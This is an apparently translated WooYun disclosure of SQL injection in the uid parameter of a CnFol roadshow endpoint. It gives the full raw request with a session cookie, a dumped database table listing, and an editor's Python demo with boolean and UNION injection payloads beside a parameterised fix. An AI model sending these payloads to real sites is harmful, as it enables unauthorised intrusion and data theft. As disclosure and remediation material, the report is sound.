
Vulnerability summary

Defect ID: wooyun-2015-0135884

Title: SQL injection on a CnFol (中金在线) site

Vendor: 福建中金在线网络股份有限公司 (CnFol, cnfol.com)

Author: 深度安全实验室 (Deep Security Lab)

Submitted: 2015-08-21 16:10

Fixed: 2015-10-05 16:40

Published: 2015-10-05 16:40

Vulnerability type: SQL injection

Severity: High

Self-rated rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-21: Details sent to the vendor, awaiting vendor action
2015-08-21: Vendor confirmed; details disclosed to the vendor only
2015-08-31: Details disclosed to core white hats and relevant domain experts
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to intern white hats
2015-10-05: Details disclosed to the public

Brief description:

Detailed description:

POST /show/addquestion/13678 HTTP/1.1
Host: roadshow.cnfol.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gold.cnfol.com/
Cookie: testroadshow=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2242f4fcec0582447d36b58266cc3b96ed%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A37.0%29+Gecko%2F201001%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1440142289%3B%7D7c8bd01e53effd6ea19f0c799915184b; Hm_lvt_c378c4854ec370c1c8438f72e19b7170=1440142318; Hm_lpvt_c378c4854ec370c1c8438f72e19b7170=1440142318; SUV=1440143183123460; FlowerRewardStatus=ChatAA
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 206

asker=%E5%8C%BF%E5%90%8D%E7%94%A8%E6%88%B7&source=%E9%BB%84%E9%87%91%E7%BD%91%E9%A6%96%E9%A1%B5&question=%E6%96%B9%E6%B3%95%E5%8F%8D%E5%8F%8D%E5%A4%8D%E5%A4%8D%E5%8F%8D%E5%8F%8D%E5%A4%8D%E5%A4%8D&uid=192

The injection point is the uid parameter in the POST body (uid=192 above).

[Screenshot: 1.png]

Proof of vulnerability:

The database has 2,399 tables; a partial listing:

Database: fol_live
[2399 tables]
+--------------+
| rs_chart |
| rs_class |
| rs_corp |
| rs_info_100 |
| rs_info_1000 |
| rs_info_1001 |
| rs_info_1002 |
| rs_info_1003 |
| rs_info_1004 |
| rs_info_1005 |
| rs_info_1006 |
| rs_info_1007 |
| rs_info_1008 |
| rs_info_1009 |
| rs_info_101 |
| rs_info_1010 |
| rs_info_1011 |
| rs_info_1012 |
| rs_info_1013 |
| rs_info_1014 |
| rs_info_1015 |
| rs_info_1016 |
| rs_info_1017 |
| rs_info_1018 |
| rs_info_1019 |
| rs_info_102 |
| rs_info_1020 |
| rs_info_1021 |
| rs_info_1022 |
| rs_info_1023 |
| rs_info_1024 |
| rs_info_1025 |
| rs_info_1026 |
| rs_info_1027 |
| rs_info_1028 |
| rs_info_1029 |
| rs_info_103 |
| rs_info_1030 |
| rs_info_1031 |
| rs_info_1032 |
| rs_info_1033 |
| rs_info_1034 |
| rs_info_1035 |
| rs_info_1036 |
| rs_info_1037 |
| rs_info_1038 |
| rs_info_1039 |
| rs_info_104 |
| rs_info_1040 |
| rs_info_1041 |
| rs_info_1042 |
| rs_info_1043 |
| rs_info_1044 |
| rs_info_1045 |
| rs_info_1046 |
| rs_info_1047 |
| rs_info_1048 |
| rs_info_1049 |
| rs_info_105 |
| rs_info_1050 |
| rs_info_1051 |
| rs_info_1052 |
| rs_info_1053 |
| rs_info_1054 |
| rs_info_1055 |
| rs_info_1056 |
| rs_info_1057 |
| rs_info_1058 |
| rs_info_1059 |
| rs_info_106 |
| rs_info_1060 |
| rs_info_1061 |
| rs_info_1062 |
| rs_info_1063 |
| rs_info_1064 |
| rs_info_1065 |
| rs_info_1066 |
| rs_info_1067 |
| rs_info_1068 |
| rs_info_1069 |
| rs_info_107 |
| rs_info_1070 |
| rs_info_1071 |
| rs_info_1072 |
| rs_info_1073 |
| rs_info_1074 |
| rs_info_1075 |
| rs_info_1076 |
| rs_info_1077 |
| rs_info_108 |
| rs_info_1082 |
| rs_info_1083 |
| rs_info_1084 |
| rs_info_1085 |
| rs_info_1086 |
| rs_info_1087 |
| rs_info_1088 |
| rs_info_1089 |
| rs_info_109 |
| rs_info_1090 |
| rs_info_1091 |
| rs_info_1092 |
| rs_info_1093 |
| rs_info_1094 |
| rs_info_1095 |
| rs_info_1096 |
| rs_info_1097 |
| rs_info_1098 |
| rs_info_1099 |
| rs_info_110 |
| rs_info_1100 |
| rs_info_1101 |
| rs_info_1102 |
| rs_info_1103 |
| rs_info_1104 |
| rs_info_1105 |
| rs_info_1106 |
| rs_info_1107 |
| rs_info_1108 |
| rs_info_1109 |
| rs_info_111 |
| rs_info_1110 |
| rs_info_1111 |
| rs_info_1112 |
| rs_info_1113 |
| rs_info_1114 |
| rs_info_1115 |
| rs_info_1116 |
| rs_info_1117 |
| rs_info_1118 |
| rs_info_1119 |
| rs_info_1120 |
| rs_info_1121 |
| rs_info_1122 |
| rs_info_1123 |
| rs_info_1124 |
| rs_info_1125 |
| rs_info_1126 |
| rs_info_1127 |
| rs_info_1128 |
| rs_info_1129 |
| rs_info_1130 |
| rs_info_1131 |
| rs_info_1132 |
| rs_info_1133 |
| rs_info_1134 |
| rs_info_1135 |
| rs_info_1136 |
| rs_info_1137 |
| rs_info_1138 |
| rs_info_1139 |
| rs_info_1140 |
| rs_info_1141 |
| rs_info_1142 |
| rs_info_1143 |
| rs_info_1144 |
| rs_info_1145 |
| rs_info_1146 |
| rs_info_1147 |
| rs_info_1149 |
| rs_info_1150 |
| rs_info_1151 |
| rs_info_1152 |
| rs_info_1153 |
| rs_info_1154 |
| rs_info_1155 |
| rs_info_1156 |
| rs_info_1157 |
| rs_info_1158 |
| rs_info_1159 |
| rs_info_1160 |
| rs_info_1161 |
| rs_info_1162 |
| rs_info_1163 |
| rs_info_1164 |
| rs_info_1165 |
| rs_info_1166 |
| rs_info_1167 |
| rs_info_1168 |
| rs_info_1169 |
| rs_info_1170 |
| rs_info_1171 |
| rs_info_1172 |
| rs_info_1173 |
| rs_info_1174 |
| rs_info_1175 |
| rs_info_1176 |
| rs_info_1177 |
| rs_info_1178 |
| rs_info_1179 |
| rs_info_1180 |
| rs_info_1181 |
| rs_info_1182 |
| rs_info_1183 |
| rs_info_1184 |
| rs_info_1185 |
| rs_info_1186 |
| rs_info_1187 |
| rs_info_1188 |
| rs_info_1189 |
| rs_info_1190 |
| rs_info_1191 |
| rs_info_1192 |
| rs_info_1193 |
| rs_info_1194 |
| rs_info_1196 |
| rs_info_1197 |
| rs_info_1199 |
| rs_info_1200 |
| rs_info_1202 |
| rs_info_1203 |
| rs_info_1204 |
| rs_info_1205 |
| rs_info_1206 |
| rs_info_1207 |
| rs_info_1208 |
| rs_info_1209 |
| rs_info_1210 |
| rs_info_1211 |
| rs_info_1212 |
| rs_info_1213 |
| rs_info_1214 |
| rs_info_1215 |
| rs_info_1216 |
| rs_info_1217 |
| rs_info_1218 |
| rs_info_1219 |
| rs_info_1220 |
| rs_info_1221 |
| rs_info_1222 |
| rs_info_1223 |
| rs_info_1224 |
| rs_info_1225 |
| rs_info_1226 |
| rs_info_1227 |
| rs_info_1228 |
| rs_info_1229 |
| rs_info_1230 |
| rs_info_1231 |
| rs_info_1232 |
| rs_info_1233 |
| rs_info_1234 |
| rs_info_1235 |
| rs_info_1236 |
| rs_info_1237 |
| rs_info_1238 |
| rs_info_1239 |
| rs_info_1240 |
| rs_info_1241 |
| rs_info_1242 |
| rs_info_1243 |
| rs_info_1244 |
| rs_info_1245 |
| rs_info_1246 |
| rs_info_1247 |
| rs_info_1248 |
| rs_info_1249 |
| rs_info_1250 |
| rs_info_1251 |

Fix recommendation:
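The report leaves this section empty, so the following is an added example (editor's code, not the author's or the vendor's) of the pattern behind a numeric-parameter injection like the uid field above, and of the fix. The testroadshow cookie in the request has the serialized-array-plus-hash layout of a CodeIgniter 2.x cookie session, which suggests the real endpoint is PHP; this model is written in Python with an in-memory SQLite database so it runs stand-alone. The table and column names (rs_user, name, api_key) and the sample rows are constructed for the demonstration and are not the fol_live schema listed in the proof. It shows the vulnerable lookup beside the parameterised one, and runs the same boolean-based probe a scanner uses (true condition versus false condition appended to a known-good value) against both:

```python
import sqlite3

# Constructed in-memory schema for the demonstration. The table and column
# names are assumptions made for this example; they are not the real fol_live
# schema listed in the report.
SCHEMA = """
CREATE TABLE rs_user (uid INTEGER PRIMARY KEY, name TEXT, api_key TEXT);
INSERT INTO rs_user VALUES (192, 'analyst192', 'k-192-secret');
INSERT INTO rs_user VALUES (193, 'analyst193', 'k-193-secret');
"""


def fresh_db():
    """New in-memory SQLite database loaded with the sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, uid):
    """The broken pattern: the raw uid string from the POST body is spliced
    into the SQL text, so anything after the digits is parsed as SQL."""
    sql = "SELECT name FROM rs_user WHERE uid = " + uid
    return [row[0] for row in db.execute(sql)]


def lookup_fixed(db, uid):
    """Hardened version: uid must parse as an integer and is passed as a bound
    parameter, so the SQL text is constant regardless of the input."""
    uid_int = int(uid)  # '192 AND 1=1' raises ValueError and never reaches SQL
    sql = "SELECT name FROM rs_user WHERE uid = ?"
    return [row[0] for row in db.execute(sql, (uid_int,))]


def boolean_probe(lookup, base="192"):
    """Boolean-based injection check for a numeric parameter: append a true
    and a false condition to the known-good value and compare the responses.
    Different responses mean the input reached the SQL parser. Returns True
    if the lookup looks injectable, False if not (including when the input is
    rejected outright)."""
    try:
        true_case = lookup(fresh_db(), base + " AND 1=1")
        false_case = lookup(fresh_db(), base + " AND 1=2")
    except ValueError:
        return False
    return true_case != false_case


def union_dump(lookup):
    """What an injectable numeric parameter gives up: a UNION against the
    same table returns a column the endpoint never meant to expose."""
    payload = "0 UNION SELECT api_key FROM rs_user"
    try:
        return lookup(fresh_db(), payload)
    except ValueError:
        return []


if __name__ == "__main__":
    print("vulnerable lookup injectable:", boolean_probe(lookup_vulnerable))
    print("fixed lookup injectable:     ", boolean_probe(lookup_fixed))
    print("vulnerable lookup leaks:     ", union_dump(lookup_vulnerable))
    print("fixed lookup leaks:          ", union_dump(lookup_fixed))
```

The integer cast is the validation layer for a purely numeric field; the bound parameter is the actual fix and is what carries over to string parameters such as asker and question, where casting is not an option. Applying the same two-request comparison to the live endpoint is the quickest way to confirm the fix once the vendor deploys it.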

Copyright notice: when reposting, credit the source 深度安全实验室@乌云 (Deep Security Lab @ WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-08-21 16:38

Vendor reply:

Thank you for the vulnerability information; we will fix it immediately.

Latest status:

None yet